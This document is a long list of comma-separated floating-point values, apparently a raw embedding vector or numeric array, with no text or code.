-0.026461679488420486, -0.014952161349356174, -0.03436809033155441, 0.01433219388127327, -0.04933483898639679, -0.00026371420244686306, -0.004303304944187403, -0.01891995407640934, 0.04192440211772919, -0.0026877422351390123, 0.0022209431044757366, 0.05581167712807655, -0.013143314979970455, 0.025659367442131042, 0.000889380113221705, -0.006713885348290205, 0.011815854348242283, -0.004157430492341518, 0.0016885001678019762, 0.0006272614118643105, -0.009722552262246609, -0.02164781279861927, 0.009810077026486397, -0.008993178606033325, -0.016162922605872154, 0.012399353086948395, -0.030954621732234955, 0.029729273170232773, 0.003395234700292349, 0.0021990619134157896, -0.0021954148542135954, -0.008365917019546032, 0.01824893057346344, 0.0071113938465714455, 0.007483374327421188, 0.01576906070113182, 0.04898473992943764, -0.01711110770702362, 0.04349984973669052, -0.036060236394405365, -0.014310312457382679, -0.015506485477089882, 0.03880268335342407, -0.003938618116080761, -0.03112967126071453, -0.021764513105154037, -0.00751254940405488, 0.009416215121746063, -0.021793687716126442, 0.022202135995030403, 0.001220789272338152, 0.011232355609536171, 0.04618394374847412, -0.033842939883470535, -0.060275446623563766, -0.04676744341850281, 0.04145760461688042, -0.0246965941041708, 0.02557184360921383, 0.06284283846616745, -0.005813108757138252, -0.013559057377278805, -0.018467742949724197, -0.008358622901141644, 0.005397365894168615, -0.002419697353616357, 0.03366789221763611, 0.025805242359638214, 0.013223545625805855, -0.0020130714401602745, 0.020991375669836998, 0.020582927390933037, 0.04174935445189476, -0.03092544712126255, -0.03010854870080948, 0.0010931488359346986, 0.01680477149784565, -0.011888791806995869, -0.00006211073196027428, 0.029422936961054802, 0.0079866424202919, 0.004073552321642637, -0.018642792478203773, 0.020378701388835907, 0.011181299574673176, -0.04808031767606735, -0.0018690201686695218, -0.031421419233083725, -0.01028416957706213, -0.017869656905531883, 0.03139224648475647, 0.024215208366513252, -0.03031277284026146, -0.014623943716287613, -0.02072880230844021, -0.030867096036672592, -0.002385052153840661, -0.005517712328583002, 0.005466656293720007, -0.029291648417711258, 0.0048685697838664055, 0.0010475630406290293, 0.02990432269871235, 0.03401799127459526, -0.002251941477879882, 0.01660054549574852, 0.013726813718676567, -0.02758491411805153, 0.00393132446333766, -0.017665432766079903, -0.015433548018336296, -0.006141326855868101, 0.04959741234779358, -0.013114139437675476, -0.028328875079751015, 0.03623528778553009, -0.028474749997258186, 0.008781659416854382, -0.02644709125161171, 0.030546171590685844, -0.02567395567893982, -0.010101825930178165, 0.003395234700292349, -0.023690059781074524, 0.015623185783624649, 0.006717531941831112, 0.01824893057346344, 0.005317134782671928, -0.005667233839631081, -0.009642320685088634, -0.02541138045489788, 0.02329619787633419, -0.005656293127685785, -0.010364401154220104, -0.019109591841697693, -0.014317606575787067, 0.025440555065870285, 0.003612223546952009, -0.04072823002934456, -0.008716016076505184, -0.009656907990574837, 0.014186318963766098, 0.002680448582395911, 0.017402857542037964, -0.02341289632022381, 0.003880268195644021, -0.0010977074271067977, 0.007249975111335516, -0.029773036018013954, 0.05216480791568756, -0.044812723994255066, 0.030808746814727783, -0.039094433188438416, -0.005138438194990158, 0.0240255706012249, 0.00030747661367058754, 0.008292979560792446, -0.026884716004133224, -0.041515953838825226, -0.015608597546815872, 0.00984654575586319, -0.013106846250593662, 0.009737139567732811, -0.0059480429627001286, 0.046475693583488464, -0.00043352151988074183, 0.030487822368741035, -0.015914935618638992, -0.00018747184367384762, 0.016046222299337387, 0.005346309393644333, -0.017811305820941925, 0.001543537131510675, -0.0018471389776095748, -0.007643836550414562, 0.012413941323757172, -0.03792743384838104, 0.0018945483025163412, 0.0013219899265095592, 0.005656293127685785, 0.02329619787633419, 0.014390544034540653, -0.007906411774456501, 0.004729988519102335, 0.029349999502301216, 0.005944395903497934, -0.025965705513954163, 0.0014569240156561136, 0.011793972924351692, -0.010575919412076473, -0.002315761521458626, 0.004004261922091246, 0.02138523757457733, -0.012720277532935143, -0.0033770003356039524, -0.007782417815178633, -0.030487822368741035, -0.011414699256420135, -0.023748409003019333, 0.0030633697751909494, -0.002848204458132386, -0.0453670471906662, 0.013697639107704163, -0.01123964972794056, -0.002315761521458626, 0.016513021662831306, 0.007716774009168148, 0.0038474465254694223, -0.0507352389395237, 0.049568239599466324, -0.0013301953440532088, -0.031975746154785156, -0.0019328404450789094, -0.017928006127476692, 0.00762924924492836, 0.009029647335410118, -0.04592137038707733, 0.014850049279630184, 0.001972955884411931, 0.023471247404813766, 0.0651768371462822, -0.012144072912633419, 0.014390544034540653, 0.0022318835835903883, 0.025557255372405052, -0.011115655303001404, 0.016250446438789368, 0.010933312587440014, -0.0017696430440992117, -0.04437509924173355, 0.052193984389305115, -0.022595997899770737, 0.013683050870895386, 0.026505442336201668, 0.01686312071979046, -0.012953677214682102, 0.0027843841817229986, -0.013872688636183739, -0.024506958201527596, 0.016615133732557297, -0.001698529114946723, -0.036001887172460556, -0.02758491411805153, -0.026986828073859215, 0.023850521072745323, -0.024448607116937637, -0.01686312071979046, 0.007891823537647724, -0.04694249480962753, 0.011684567667543888, -0.010605094023048878, 0.04880969226360321, -0.02695765346288681, 0.021005963906645775, 0.0010129177244380116, -0.008125223219394684, 0.01064156275242567, 0.007425024639815092, -0.03174234554171562, -0.0551406554877758, 0.032034095376729965, 0.02139982581138611, 0.020860088989138603, -0.03282181918621063, -0.004219427239149809, 0.032500892877578735, -0.00658624479547143, -0.012494171969592571, -0.01512721087783575, -0.023675471544265747, -0.012844271957874298, -0.02417144551873207, -0.011254237033426762, 0.025440555065870285, -0.0007617396768182516, 0.00881083495914936, -0.01613374799489975, 0.009788195602595806, 0.02516339346766472, -0.021968737244606018, 0.03416386619210243, -0.007239034399390221, -0.004463767167180777, -0.00046816677786409855, -0.0014450717717409134, -0.003880268195644021, -0.012997440062463284, -0.018059294670820236, -0.02237718552350998, 0.017563318833708763, -0.013850807212293148, -0.007012928370386362, -0.0024816941004246473, 0.013952919282019138, -0.02221672423183918, -0.01906582899391651, -0.018278105184435844, -0.0474092923104763, 0.028678975999355316, -0.002984961960464716, 0.005357250105589628, 0.039152782410383224, -0.006232498679310083, -0.007716774009168148, -0.00035921655944548547, 0.004135549068450928, -0.01549189817160368, 0.006677416618913412, -0.04449179768562317, -0.000011154289495607372, 0.0051238504238426685, -0.0289123747497797, -0.011487636715173721, 0.006768588442355394, -0.007950173690915108, -0.0031508945394307375, -0.007519843056797981, 0.027657851576805115, 0.011064599268138409, 0.008482616394758224, 0.035184990614652634, 0.005528653040528297, -0.02227507345378399, -0.004037083592265844, 0.009824664331972599, -0.023267021402716637, -0.010583212599158287, 0.0037179826758801937, 0.002895613666623831, -0.006721179001033306, -0.007585486862808466, -0.013828925788402557, -0.019882727414369583, 0.007716774009168148, 0.023223260417580605, 0.039152782410383224, -0.009423508308827877, 0.00788453035056591, -0.01973685249686241, -0.047350943088531494, 0.009547501802444458, 0.014828167855739594, -0.005196787882596254, -0.00892024114727974, -0.0014332194114103913, 0.014346781186759472, 0.004339773673564196, 0.004762810654938221, 0.0032821819186210632, 0.003462701803073287, -0.011283411644399166, -0.04104915261268616, 0.01763625629246235, -0.005273371934890747, 0.0029247887432575226, 0.012333709746599197, -0.04347067326307297, -0.011254237033426762, 0.022129198536276817, 0.02315032295882702, 0.02561560645699501, -0.016206683591008186, 0.015083448961377144, -0.00922657735645771, 0.016279621049761772, 0.0022428242955356836, 0.007972055114805698, -0.005623471457511187, -0.0016091808211058378, 0.012610872276127338, -0.004080845974385738, 0.012931796722114086, -0.014361368492245674, -0.010043476708233356, 0.005306194070726633, 0.0033551191445440054, 0.015739886090159416, -0.022610586136579514, -0.018876193091273308, -0.002727857790887356, -0.006068389397114515, -0.028372637927532196, 0.011217768304049969, -0.002011248143389821, -0.01327460166066885, 0.01727157086133957, -0.017957180738449097, 0.007534430827945471, -0.01660054549574852, 0.009912189096212387, -0.030750397592782974, 0.02392345853149891, 0.003887562081217766, -0.01482087466865778, 0.04282882437109947, -0.003433526959270239, -0.004897744860500097, -0.011195886880159378, 0.01005076989531517, 0.0052004349417984486, 0.03792743384838104, -0.03877350687980652, 0.01619209721684456, -0.012107604183256626, 0.022975273430347443, 0.0336095429956913, -0.033230267465114594, -0.007465140428394079, 0.015798235312104225, 0.006031920667737722, -0.0039532058872282505, -0.02439025789499283, -0.04799279198050499, -0.0028226764407008886, -0.028110064566135406, 0.0029229652136564255, -0.01810305565595627, 0.03133389726281166, -0.020845500752329826, -0.007020222023129463, 0.0028664388228207827, 0.014602062292397022, -0.01169915497303009, 0.004631523042917252, 0.017665432766079903, 0.00984654575586319, -0.024521544575691223, 0.03509746491909027, -0.01994107849895954, 0.008840009570121765, 0.003630457678809762, -0.009087996557354927, 0.007169743999838829, -0.032909344881772995, 0.009452683851122856, 0.009598558768630028, 0.0295833982527256, 0.030137723311781883, 0.005958983208984137, -0.017154870554804802, -0.04323727637529373, 0.009532914496958256, -0.01912418007850647, 0.05268995836377144, -0.0067321197129786015, 0.001640179194509983, -0.04262460023164749, 0.008540966548025608, -0.052602432668209076, 0.016002459451556206, -0.010101825930178165, -0.03395964205265045, -0.008519085124135017, -0.0277307890355587, 0.005072794388979673, -0.02490082010626793, 0.012209716252982616, -0.00024616363225504756, 0.016002459451556206, 0.008176279254257679, 0.013916450552642345, 0.032034095376729965, -0.018278105184435844, 0.0030761337839066982, -0.0002038827515207231, -0.006447663996368647, 0.01871572993695736, -0.02767243981361389, 0.042916350066661835, -0.0022774694953113794, -0.03145059570670128, -0.00166206038556993, 0.003894855733960867, -0.0005101057467982173, -0.006002746056765318, -0.043587375432252884, -0.011064599268138409, -0.0026056875940412283, -0.011896085925400257, -0.029714686796069145, 0.0011551456991583109, -0.005608884152024984, -0.008679547347128391, 0.00794287957251072, -0.006042861379683018, 0.002840910805389285, 0.004379889462143183, 0.00832215417176485, 0.00963502749800682, -0.0023285257630050182, -0.012122191488742828, -0.02298985980451107, 0.027701614424586296, -0.02227507345378399, 0.015841998159885406, -0.028591450303792953, -0.012508759275078773, 0.006604479160159826, -0.013872688636183739, -0.027176465839147568, -0.025586429983377457, 0.028533101081848145, -0.013260014355182648, 0.0013010203838348389, -0.01613374799489975, -0.031012970954179764, -0.012209716252982616, -0.046358995139598846, -0.010524863377213478, 0.0013219899265095592, -0.005579709075391293, -0.0220125000923872, -0.006779528688639402, -0.002928435569629073, 0.024244382977485657, -0.0166443083435297, -0.007166096940636635, 0.002120654098689556, -0.008008523844182491, -0.0015353317139670253, 0.007140568923205137, -0.007341146469116211, -0.025396794080734253, -0.010575919412076473, -0.024098508059978485, 0.013128727674484253, -0.0009627733379602432, 0.05928349867463112, 0.005397365894168615, 0.01644008420407772, 0.006848819553852081, 0.03635198622941971, -0.004259542562067509, -0.02803712710738182, -0.0017887890571728349, 0.0052369036711752415, 0.015418960712850094, -0.002984961960464716, 0.0044127111323177814, -0.012158660218119621, -0.011451167985796928, 0.01492298673838377, 0.020816326141357422, -0.0352725125849247, 0.017548732459545135, 0.02042246423661709, -0.0018544327467679977, -0.06091729551553726, 0.008183573372662067, 0.005495830904692411, 0.0012362884590402246, -0.011640804819762707, 0.0016237682430073619, 0.011268824338912964, -0.0129390899091959, 0.0104154571890831, -0.030341947451233864, -0.019299229606986046, 0.0029703746549785137, -0.03267594426870346, -0.02097678929567337, -0.023077385500073433, -0.02860603854060173, 0.01638173498213291, -0.0235150083899498, -0.027045177295804024, -0.014222787693142891, 0.005886046215891838, 0.006516954395920038, 0.02510504424571991, -0.006568010430783033, -0.01705275848507881, -0.025338442996144295, -0.00479563232511282, -0.030283598229289055, 0.012078428640961647, -0.009583970531821251, -0.019576391205191612, 0.012464997358620167, -0.02144358865916729, -0.007053044158965349, 0.049714114516973495, -0.008344035595655441, 0.041311729699373245, -0.015710709616541862, -0.01810305565595627, -0.013602820225059986, -0.016819357872009277, -0.004354361444711685, -0.047817740589380264, 0.021983323618769646, -0.038890209048986435, 0.0015708886785432696, -0.014864636585116386, 0.008285685442388058, 0.012618165463209152, -0.0028190293814986944, -0.012880739755928516, 0.013442358002066612, 0.033376142382621765, 0.020014015957713127, -0.0581456758081913, 0.033638715744018555, 0.0038693277165293694, 0.017300745472311974, -0.009664202108979225, 0.001152410521171987, -0.0520772859454155, -0.02577606774866581, 0.00001743659049679991, -0.025630192831158638, -0.0004622405976988375, 0.01317248959094286, 0.00914634671062231, -0.0010174763156101108, 0.036672912538051605, -0.03547674044966698, 0.00014712836127728224, -0.005630765110254288, -0.004102727398276329, 0.012384765781462193, -0.003821918275207281, -0.013179783709347248, 0.01922629214823246, -0.002552808029577136, 0.008526379242539406, 0.018482331186532974, 0.018599029630422592, -0.008008523844182491, -0.013792457059025764, 0.007592780515551567, 0.007373968604952097, 0.010225819423794746, 0.02103513851761818, -0.0026950358878821135, -0.0004093610041309148, 0.009985126554965973, 0.0584665983915329, 0.004613288678228855, 0.009029647335410118, -0.00038269328069873154, 0.012041960842907429, 0.006582598201930523, -0.016790183261036873, 0.0035465797409415245, -0.025542668998241425, -0.005411953199654818, -0.011852323077619076, 0.01763625629246235, 0.009722552262246609, -0.05021008849143982, -0.009452683851122856, -0.0038839152548462152, 0.02158946357667446, 0.011458461172878742, 0.010590506717562675, -0.01902206800878048, -0.015798235312104225, 0.009241165593266487, 0.0011268823873251677, 0.04632981866598129, -0.019561802968382835, 0.007053044158965349, -0.011181299574673176, -0.017242394387722015, -0.0015462723094969988, 0.012187834829092026, 0.01224618498235941, -0.013165196403861046, -0.026213692501187325, -0.001967485761269927, -0.008650372736155987, -0.014142557047307491, -0.008263804018497467, -0.007286443840712309, 0.01660054549574852, -0.013836219906806946, 0.004591407719999552, -0.009117172099649906, 0.016936058178544044, -0.014011269435286522, -0.014769818633794785, 0.016308797523379326, -0.02026200294494629, 0.007636542897671461, -0.015856584534049034, 0.0035538736265152693, -0.03031277284026146, -0.01865738071501255, -0.018599029630422592, 0.006939990911632776, 0.0015635949093848467, -0.03886103257536888, 0.0013985740952193737, -0.0052004349417984486, -0.0265492033213377, 0.014397837221622467, -0.008271098136901855, -0.01943051628768444, -0.022610586136579514, -0.007348440587520599, -0.011166712269186974, -0.01674642041325569, 0.009999713860452175, -0.0023577006068080664, 0.06949473172426224, 0.029962673783302307, -0.003336884779855609, -0.0021188308019191027, -0.0049123321659862995, -0.028226763010025024, 0.003353295847773552, 0.014419718645513058, 0.004642463754862547, -0.012151366099715233, 0.036672912538051605, -0.01374140102416277, -0.006261673755943775, 0.00013937876792624593, 0.02050998993217945, 0.0004043465596623719, 0.0014696880243718624, -0.0017514086794108152, 0.010838493704795837, 0.02139982581138611, 0.014740643091499805, 0.011385523714125156, 0.007556311786174774, -0.013143314979970455, 0.013238132931292057, -0.027278577908873558, 0.015418960712850094, -0.008905652910470963, -0.006491426378488541, -0.013493414036929607, -0.020116128027439117, -0.005922514945268631, -0.015535661019384861, -0.0018626381643116474, -0.004923272877931595, 0.006389313843101263, 0.012122191488742828, 0.0025947471149265766, -0.0021315948106348515, -0.020116128027439117, 0.007056690752506256, -0.00003319220195407979, 0.010116414166986942, -0.022756461054086685, -0.009036940522491932, -0.03045864775776863, 0.04066988080739975, 0.009810077026486397, -0.019153354689478874, -0.025192568078637123, -0.0021990619134157896, -0.017198633402585983, 0.013026614673435688, 0.047613516449928284, -0.0008829981088638306, 0.015170973725616932, -0.0005046354490332305, 0.000889380113221705, 0.00438353605568409, -0.036264460533857346, 0.022552235051989555, 0.005521359387785196, 0.016265034675598145, 0.014558299444615841, 0.01975144073367119, -0.023777583613991737, -0.02252306044101715, 0.00951103400439024, -0.0005123850423842669, 0.002474400447681546, 0.006396607495844364, -0.029058249667286873, 0.014551006257534027, -0.006498720031231642, 0.024258971214294434, 0.03676043823361397, -0.023339958861470222, -0.007877236232161522, -0.030283598229289055, -0.028372637927532196, 0.029831385239958763, 0.020553752779960632, -0.000587145856115967, 0.00474092923104763, -0.002062304178252816, -0.00963502749800682, -0.0019474278669804335, 0.013639288954436779, -0.00587875209748745, -0.017038170248270035, -0.005003503989428282, -0.00021858418767806143, 0.01283697783946991, 0.0019565450493246317, -0.0014423365937545896, 0.0020076013170182705, -0.00463881716132164, -0.019459690898656845, -0.007760536391288042, -0.02144358865916729, 0.01839480549097061, -0.005922514945268631, 0.03220914304256439, -0.003006843151524663, -0.02536761946976185, 0.021516526117920876, 0.007556311786174774, 0.005962630268186331, 0.0004542630922514945, 0.004277776926755905, -0.006214264314621687, 0.013391301967203617, 0.010838493704795837, -0.02752656489610672, -0.010561332106590271, -0.016265034675598145, -0.0025801595766097307, -0.01922629214823246, 0.013398595154285431, -0.024463195353746414, -0.022143786773085594, -0.013026614673435688, 0.010554037988185883, -0.023062797263264656, -0.006341904867440462, 0.0023741114418953657, -0.03702301159501076, -0.030137723311781883, 0.009999713860452175, 0.04058235511183739, 0.02809547632932663, 0.02077256329357624, 0.015637772157788277, -0.016265034675598145, 0.04180770367383957, -0.020801739767193794, 0.005244197323918343, 0.003692454658448696, 0.03334696590900421, 0.013077670708298683, -0.006002746056765318, 0.019809789955615997, -0.01512721087783575, 0.030079372227191925, 0.023237846791744232, -0.01906582899391651, -0.015637772157788277, 0.011268824338912964, 0.004339773673564196, -0.006360138766467571, 0.014127969741821289, -0.0005415600026026368, 0.02046622708439827, 0.016410909593105316, 0.017125695943832397, 0.009883014485239983, -0.0029612574726343155, -0.027701614424586296, -0.011881498619914055, 0.007563605438917875, -0.009671496227383614, 0.023442072793841362, 0.005973570980131626, -0.016469258815050125, -0.0007466963725164533, 0.021356062963604927, -0.012742158956825733, -0.022202135995030403, -0.03305521607398987, -0.020743388682603836, 0.011487636715173721, 0.008635785430669785, -0.03541838750243187, 0.0010475630406290293, -0.012873446568846703, 0.005021738354116678, -0.01757790707051754, -0.023529596626758575, -0.0016410909593105316, -0.001521655940450728, -0.009058821946382523, 0.03045864775776863, -0.010904137045145035, -0.004919625818729401, 0.04326644912362099, -0.023544184863567352, 0.00881083495914936, -0.010663444176316261, -0.007920999079942703, -0.00809604860842228, 0.01332565862685442, 0.026374153792858124, -0.026199104264378548, -0.0006532453699037433, -0.018438568338751793, -0.0035976360086351633, -0.004117314703762531, 0.015170973725616932, 0.0040079085156321526, -0.02510504424571991, 0.004128255415707827, 0.005714643280953169, -0.013362126424908638, -0.018059294670820236, 0.025542668998241425, -0.008037698455154896, 0.02881026268005371, 0.002715093782171607, -0.01613374799489975, -0.008424266241490841, -0.022800223901867867, -0.000427139486419037, 0.0072791497223079205, 0.02118101343512535, 0.002009424613788724, 0.015506485477089882, 0.018832430243492126, -0.0011834088945761323, 0.03314274176955223, 0.018234344199299812, -0.02953963726758957, 0.01603163406252861, -0.0002748827391769737, -0.002538220724090934, -0.022231310606002808, -0.006786822807043791, 0.03772320970892906, -0.0030560758896172047, -0.013486120849847794, 0.01877407915890217, 0.016775596886873245, 0.005342662800103426, 0.029349999502301216, -0.003030547872185707, -0.005794874392449856, -0.005991805344820023, -0.011487636715173721, 0.006604479160159826, 0.02061210200190544, -0.034455616027116776, -0.004832101054489613, 0.015375198796391487, -0.025703130289912224, 0.006692003924399614, -0.007435965351760387, -0.00018519254808779806, 0.024200620129704475, 0.02107890136539936, -0.01788424327969551, 0.030225247144699097, -0.01224618498235941, 0.00889106560498476, -0.004186605103313923, -0.009416215121746063, 0.0011514987563714385, 0.03334696590900421, 0.020641276612877846, -0.007136921864002943, 0.026155341416597366, -0.022960685193538666, -0.005977217573672533, -0.0031363070011138916, -0.020130714401602745, 0.01468958705663681, -0.02758491411805153, 0.013063083402812481, -0.0007043015211820602, -0.020320352166891098, -0.018161406740546227, 0.028678975999355316, -0.01751955784857273, -0.005484890658408403, -0.00892024114727974, 0.008613904006779194, -0.012829683721065521, 0.004153783433139324, -0.006801410112529993, -0.01123964972794056, -0.010488394647836685, 0.005714643280953169, 0.004627876449376345, 0.0238651093095541, -0.00047454878222197294, 0.004554938990622759, -0.008416973054409027, 0.01399668212980032, -0.018599029630422592, -0.025601018220186234, -0.007373968604952097, -0.022100023925304413, 0.020962201058864594, -0.0001173835844383575, -0.010444631800055504, -0.02530926838517189, 0.007461493369191885, 0.007352087181061506, -0.01762166991829872, 0.036060236394405365, 0.018278105184435844, -0.026724252849817276, 0.01727157086133957, 0.007775124162435532, 0.007775124162435532, -0.004682579543441534, 0.005798520985990763, -0.0012454056413844228, -0.009992420673370361, -0.019299229606986046, 0.021297713741660118, 0.011203180998563766, 0.01468958705663681, -0.03133389726281166, -0.01118859276175499, -0.02144358865916729, -0.00034987146500498056, 0.009934070520102978, -0.017855068668723106, 0.022668935358524323, 0.017504969611763954, -0.0033040631096810102, 0.02422979474067688, 0.017548732459545135, 0.007789711467921734, -0.030283598229289055, -0.00009795261576073244, -0.01020393893122673, 0.012807803228497505, 0.01751955784857273, 0.024769531562924385, 0.005849577486515045, 0.0034098222386091948, 0.01578364707529545, 0.026169929653406143, -0.012319122441112995, 0.01706734485924244, -0.009000471793115139, 0.007147862575948238, 0.020860088989138603, -0.024113096296787262, -0.01870114356279373, -0.021662399172782898, 0.019547216594219208, -0.022960685193538666, -0.0023230554070323706, 0.006170501932501793, -0.010240407660603523, 0.018671967089176178, 0.043937474489212036, -0.02134147472679615, -0.0043288329616189, -0.005401012487709522, -0.0021024197340011597, -0.027657851576805115, -0.01538978610187769, 0.011487636715173721, 0.01814681850373745, 0.0011250589741393924, 0.0049925632774829865, -0.015375198796391487, -0.009883014485239983, -0.008183573372662067, 0.0012144072679802775, 0.005444774869829416, -0.006498720031231642, -0.008643078617751598, 0.02422979474067688, -0.01763625629246235, -0.005787580739706755, -0.011494929902255535, -0.014390544034540653, 0.00004347751382738352, -0.006042861379683018, -0.024550719186663628, 0.016979821026325226, 0.0016018870519474149, 0.028255939483642578, 0.020174477249383926, -0.0201598908752203, -0.02042246423661709, 0.02608240395784378, -0.009029647335410118, -0.03285099193453789, 0.026768015697598457, -0.011808561161160469, -0.03696466237306595, -0.01142199244350195, -0.01814681850373745, 0.02325243502855301, 0.015521072782576084, 0.002664037514477968, 0.024288145825266838, -0.002304821042343974, -0.006630007177591324, 0.030429473146796227, 0.009795489721000195, 0.011728329584002495, -0.005120203830301762, 0.004153783433139324, -0.012895327992737293, -0.0142009062692523, 0.027395278215408325, 0.02490082010626793, -0.0066956509836018085, 0.011050011962652206, 0.007373968604952097, -0.008606609888374805, -0.008380504325032234, -0.016265034675598145, 0.028547687456011772, 0.02339830994606018, 0.031071322038769722, -0.00646954495459795, 0.006414841860532761, -0.016513021662831306, 0.00961314607411623, -0.013201664201915264, -0.0021388884633779526, -0.014106088317930698, 0.0010685325833037496, -0.009117172099649906, -0.003271241206675768, -0.0026749782264232635, 0.002186297671869397, -0.03037112206220627, 0.03544756397604942, 0.008745190687477589, 0.009058821946382523, -0.02581983059644699, 0.005685468204319477, 0.011429286561906338, 0.0074432590045034885, 0.042653776705265045, -0.0019383106846362352, -0.018978305160999298, -0.0014669529628008604, -0.005251490976661444, -0.007147862575948238, -0.009153640829026699, 0.010087238624691963, -0.0040443772450089455, -0.005944395903497934, 0.00028058094903826714, -0.007133275270462036, -0.0019127826672047377, 0.0013794280821457505, -0.0086576659232378, 0.00467893248423934, 0.012319122441112995, 0.0026986829470843077, 0.008723310194909573, 0.032909344881772995, -0.013260014355182648, -0.0037216295022517443, 0.007330206222832203, 0.013267308473587036, 0.0003446290793363005, 0.02990432269871235, -0.003858387004584074, 0.006768588442355394, -0.007702186703681946, 0.017898831516504288, -0.017038170248270035, 0.01566694863140583, -0.010481100529432297, 0.008592022582888603, 0.014755230396986008, -0.0005857782671228051, -0.006520600989460945, -0.00228111632168293, -0.04854711517691612, 0.02762867696583271, -0.020553752779960632, 0.0034791126381605864, -0.014470774680376053, -0.010896843858063221, -0.00269321259111166, -0.009095290675759315, -0.015098036266863346, 0.0055432403460145, 0.020787151530385017, 0.011042718775570393, 0.008650372736155987, -0.0008943945285864174, -0.014616649597883224, 0.008942121639847755, 0.04317892715334892, 0.003705218667164445, 0.018628206104040146, 0.0141206756234169, 0.018000943586230278, -0.001856256159953773, 0.003645045217126608, -0.015331435948610306, 0.014645824208855629, 0.012122191488742828, 0.0014259256422519684, -0.009073409251868725, 0.0038693277165293694, 0.018569855019450188, 0.016469258815050125, 0.01559401024132967, -0.003234772477298975, 0.012399353086948395, -0.01608998514711857, 0.0007517107878811657, -0.015579422935843468, 0.002191768027842045, -0.007089512888342142, 0.01824893057346344, -0.01075096894055605, 0.032442543655633926, 0.002428814535960555, 0.014419718645513058, 0.0019182529067620635, -0.0035939891822636127, -0.009474565275013447, -0.012187834829092026, -0.018686555325984955, -0.020655864849686623, 0.0028226764407008886, 0.005422893911600113, 0.003659632755443454, 0.016629721969366074, -0.0036705732345581055, 0.009532914496958256, 0.0012235244503244758, -0.011152124032378197, 0.01788424327969551, -0.004274130333214998, -0.0027770905289798975, 0.016279621049761772, 0.005896986462175846, -0.004037083592265844, -0.03489324077963829, 0.004317892715334892, 0.0039532058872282505, 0.00963502749800682, 0.003134483704343438, 0.008314860984683037, -0.00809604860842228, 0.01468958705663681, -0.006870700512081385, -0.0017960828263312578, 0.029627161100506783, 0.005379131529480219, -0.017825894057750702, 0.02164781279861927, -0.015112623572349548, 0.0052369036711752415, 0.0263887420296669, -0.019357578828930855, 0.003634104738011956, -0.015068861655890942, -0.01840939372777939, -0.017971768975257874, 0.009066115133464336, -0.012756746262311935, 0.0035903421230614185, -0.0017140283016487956, 0.013588232919573784, -0.0011542339343577623, -0.005999098997563124, 0.017490381374955177, 0.004241308197379112, 0.009861133061349392, 0.0064075482077896595, 0.0045877606607973576, 0.011706448160111904, -0.013566351495683193, -0.012756746262311935, -0.010904137045145035, -0.00830027274787426, -0.021195601671934128, 0.005470302887260914, 0.005700055975466967, 0.0014833637978881598, 0.00444553280249238, 0.011473048478364944, 0.011079187504947186, 0.000022337069822242483, 0.016323383897542953, -0.005083735100924969, 0.005433834157884121, -0.014981336891651154, 0.0017194985412061214, -0.004518470261245966, 0.0058714584447443485, -0.005302547011524439, -0.023952633142471313, -0.0013848984381183982, 0.005196787882596254, 0.00047773978440091014, -0.003681513946503401, 0.0014860989758744836, -0.012093016877770424, 0.011101067997515202, -0.024827882647514343, 0.009503739885985851, 0.010007007978856564, 0.0035629908088594675, 0.0029448464047163725, 0.030283598229289055, -0.0014906575670465827, 0.002282939851284027, -0.009489152580499649, 0.028518512845039368, 0.02138523757457733, 0.0025363971944898367, -0.037198059260845184, -0.024871643632650375, 0.0028500279877334833, -0.01989731565117836, 0.003949558828026056, 0.007118687499314547, 0.004967035260051489, 0.015433548018336296, 0.03150894492864609, 0.004719048272818327, -0.007680305279791355, -0.01134176179766655, 0.0028992604929953814, 0.014003975316882133, 0.003045135410502553, 0.0004016114107798785, 0.0023558770772069693, -0.0014569240156561136, 0.015623185783624649, 0.008380504325032234, 0.008840009570121765, -0.007950173690915108, -0.0034572314471006393, 0.019926490262150764, 0.016615133732557297, -0.006166854873299599, 0.004339773673564196, 0.01512721087783575, -0.0019601918756961823, 0.02937917411327362, -0.029452111572027206, 0.0021735336631536484, -0.00332412077113986, -0.01810305565595627, 0.01409879419952631, 0.004704460501670837, -0.012158660218119621, 0.010926018469035625, -0.00868684146553278, 0.0002810368314385414, 0.0033915878739207983, 0.0104154571890831, 0.02185203693807125, 0.014171731658279896, -0.0023212318774312735, -0.012085722759366035, 0.01861361786723137, -0.02247929945588112, -0.015696123242378235, -0.009941363707184792, 0.008438854478299618, 0.031012970954179764, 0.0020878324285149574, -0.014485361985862255, 0.006144973915070295, 0.002760679693892598, 0.02005777694284916, 0.01131258625537157, -0.010605094023048878, 0.00404802430421114, 0.0011779385386034846, 0.023996395990252495, -0.0022318835835903883, 0.03562261164188385, 0.006371079478412867, 0.007789711467921734, -0.011764798313379288, -0.00426683621481061, -0.02077256329357624, 0.0016228565946221352, -0.02169157564640045, -0.0006682886742055416, 0.0016292385989800096, -0.009073409251868725, -0.0117575041949749, 0.0027552093379199505, -0.010218526236712933, -0.01262545958161354, -0.005587002728134394, -0.0066190664656460285, 0.012793214991688728, -0.020903851836919785, 0.005163966212421656, 0.0004569982411339879, 0.0052916062995791435, 0.009934070520102978, 0.009168228134512901, -0.019780615344643593, 0.0009135405998677015, 0.014397837221622467, 0.00043511702097021043, -0.010357107035815716, -0.017329920083284378, -0.010378988459706306, -0.015550248324871063, 0.008701428771018982, -0.01435407530516386, 0.03066287189722061, -0.005762052722275257, -0.004281423985958099, -0.0042084865272045135, 0.005754758603870869, 0.028270525857806206, -0.0061741485260427, 0.021924974396824837, 0.004471060819923878, 0.012997440062463284, 0.004409064073115587, -0.02329619787633419, -0.01193255465477705, 0.0052369036711752415, -0.012144072912633419, -0.007319265510886908, 0.014747937209904194, -0.006743060424923897, -0.0277307890355587, -0.011786679737269878, -0.019649328663945198, -0.011217768304049969, -0.0019328404450789094, -0.0010521216318011284, 0.013580938801169395, 0.03112967126071453, -0.005145731847733259, 0.015200148336589336, -0.012764040380716324, -0.00002824898729159031, -0.006163208279758692, 0.006542482413351536, -0.0319465696811676, -0.004547645337879658, -0.004241308197379112, 0.02902907505631447, 0.0117575041949749, -0.010692618787288666, 0.0009664202225394547, -0.00835132971405983, 0.0006582597852684557, 0.010335225611925125, -0.010714500211179256, -0.020393289625644684, 0.016104571521282196, 0.015987873077392578, 0.01340588927268982, 0.009168228134512901, 0.0023905225098133087, -0.012085722759366035, 0.0064075482077896595, -0.009751726873219013, 0.0027406217996031046, 0.011480342596769333, 0.003045135410502553, -0.004299658350646496, 0.01824893057346344, 0.0015052451053634286, -0.006815997418016195, 0.014952161349356174, 0.02046622708439827, -0.011502224020659924, -0.00481751374900341, -0.010072651319205761, -0.012056548148393631, 0.005794874392449856, 0.00971525814384222, 